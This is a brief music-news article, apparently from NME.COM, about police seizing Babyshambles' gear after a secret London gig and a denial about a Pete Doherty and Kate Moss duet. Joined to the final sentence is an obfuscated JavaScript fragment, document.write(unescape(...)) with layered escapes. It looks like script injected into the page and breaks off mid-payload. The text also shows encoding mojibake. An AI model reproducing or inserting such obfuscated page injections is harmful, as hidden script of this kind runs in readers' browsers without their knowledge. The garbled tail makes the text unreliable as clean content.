Babyshambles have had their equipment seized by police after a secret gig in London.
The band played last night (August 11) at the Duke Of Clarence in north London. Following their set, the police arrived and confiscated their equipment.
A spokesperson for the band told NME.COM: “All the band's gear has been seized by the police. The band are still going ahead with a gig in Norway at the Oya Festival in Oslo tonight (August 12), they flew to Norway this morning and are borrowing equipment to do the show.â€
In other news, a spokesperson for the band has denied Pete Doherty will be appearing at this weekend's Lost Vagueness festival near Lewes.
The spokesman said: "Contrary to what has been reported in several tabloids, Peter has never agreed to, or ever had any intention of duetting with Kate Moss at the Lost Vagueness festival this weekend.
“Also, he has never recorded a version of The Divinyls' ‘I Touch Myself' with Kate or with Babyshambles and has no intention of ever doing so."document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
